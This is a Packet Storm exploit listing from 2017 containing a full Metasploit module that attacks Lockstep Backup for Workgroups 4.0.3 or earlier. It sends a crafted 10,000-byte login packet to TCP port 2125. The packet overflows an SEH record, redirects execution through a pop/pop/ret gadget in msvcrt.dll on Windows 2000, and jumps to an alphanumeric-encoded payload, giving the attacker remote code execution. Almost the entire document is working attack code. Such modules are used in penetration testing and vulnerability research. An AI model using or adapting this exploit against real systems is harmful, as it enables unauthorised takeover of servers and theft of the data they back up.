Lockstep Backup For Workgroups 4.0.3 Buffer Overflow

2017-09-14T00:00:00
ID PACKETSTORM:144158
Type packetstorm
Reporter James Fitts
Modified 2017-09-14T00:00:00

Description

                                        
                                            `require 'msf/core'  
  
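class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Layout of the 10000-byte login request (absolute byte offsets):
  #   0..7        HEADER ("BFWCA\x01\x01\x00")
  #   8..         NUL-terminated USERNAME; must end before PAYLOAD_OFF
  #   73..        NOP_PAD bytes of 0x90, then the GetPC stub and the
  #               alphanumeric payload (at most NOP_PAD + 1000 bytes,
  #               well short of NSEH_OFF)
  #   7197..7200  nSEH: short jmp forward over the handler address
  #   7201..7204  SEH handler: pop/pop/ret gadget (target.ret)
  #   7205..7212  NOP sled
  #   7213..7214  jmp edi -- relies on EDI pointing into the payload region
  #               when the handler chain runs; that is not verifiable from
  #               this module, so confirm it in a debugger before retargeting
  # Everything else is upper-case alpha filler.
  HEADER       = "BFWCA\x01\x01\x00".freeze
  USERNAME_OFF = 8
  PAYLOAD_OFF  = 73
  NSEH_OFF     = 7197
  PACKET_LEN   = 10000
  NOP_PAD      = 16

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Lockstep Backup for Workgroups <= 4.0.3',
      'Description'    => %q{
        This module exploits a stack buffer overflow found in
        Lockstep Backup for Workgroups <= 4.0.3. The vulnerability
        is triggered when sending a specially crafted packet that
        will cause a login failure. The overflow clobbers an SEH
        record; the handler is redirected through a pop/pop/ret
        gadget back into the packet, which then jumps into an
        alphanumeric-encoded payload carried earlier in the request.
      },
      'Author'         => [ 'james fitts' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://secunia.com/advisories/50260/' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'          => 1000,
          'BadChars'       => "\x00",
          # GetPC stub: jmp +3 / pop ecx / jmp +5 / call -8. After it runs,
          # ECX holds the address of the byte right after the stub, i.e. the
          # start of the encoded payload, which is what BufferRegister needs.
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ECX',
            },
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows 2000 ALL EN',
            {
              # pop ecx / pop ecx / retn in msvcrt.dll. The address is
              # specific to the Windows 2000 EN build of that DLL and has
              # to be re-found for any other OS, language or service pack.
              'Ret' => 0x780146c0,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 11 2013'))

    register_options(
      [
        Opt::RPORT(2125),
        OptString.new('USERNAME', [ true, 'Username of victim', 'msf' ])
      ], self.class)
  end

  # Builds the malformed login request and sends it in a single write.
  #
  # Fails with BadConfig, before any socket is opened, when USERNAME is
  # too long to fit between the header and the payload region; a longer
  # name would otherwise be partly overwritten by the payload and the
  # request would no longer look like a login attempt.
  def exploit
    # Work on raw bytes so multi-byte usernames cannot shift the offsets.
    uname = datastore['USERNAME'].b
    max_uname = PAYLOAD_OFF - USERNAME_OFF - 1 # leave room for the NUL
    if uname.bytesize > max_uname
      fail_with(Failure::BadConfig,
                "USERNAME is #{uname.bytesize} bytes; at most #{max_uname} fit before the payload at offset #{PAYLOAD_OFF}")
    end

    stub = "\x90" * NOP_PAD
    stub << payload.encoded

    packet = rand_text_alpha_upper(PACKET_LEN)
    packet[0, HEADER.bytesize] = HEADER
    # The slice width covers the terminating NUL so the packet stays exactly
    # PACKET_LEN bytes; a width of uname.bytesize alone inserts the NUL and
    # grows the request by one byte.
    packet[USERNAME_OFF, uname.bytesize + 1] = "#{uname}\x00"
    packet[PAYLOAD_OFF, stub.bytesize] = stub
    packet[NSEH_OFF, 4]      = "\xeb\x06\x90\x90"     # nSEH: jmp $+8
    packet[NSEH_OFF + 4, 4]  = [target.ret].pack('V')  # SEH: pop/pop/ret
    packet[NSEH_OFF + 8, 8]  = "\x90" * 8              # NOP sled
    packet[NSEH_OFF + 16, 2] = "\xff\xe7"              # jmp edi

    print_status("Trying target %s..." % target.name)

    connect
    sock.put(packet)
    handler
    disconnect
  end
end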
  
`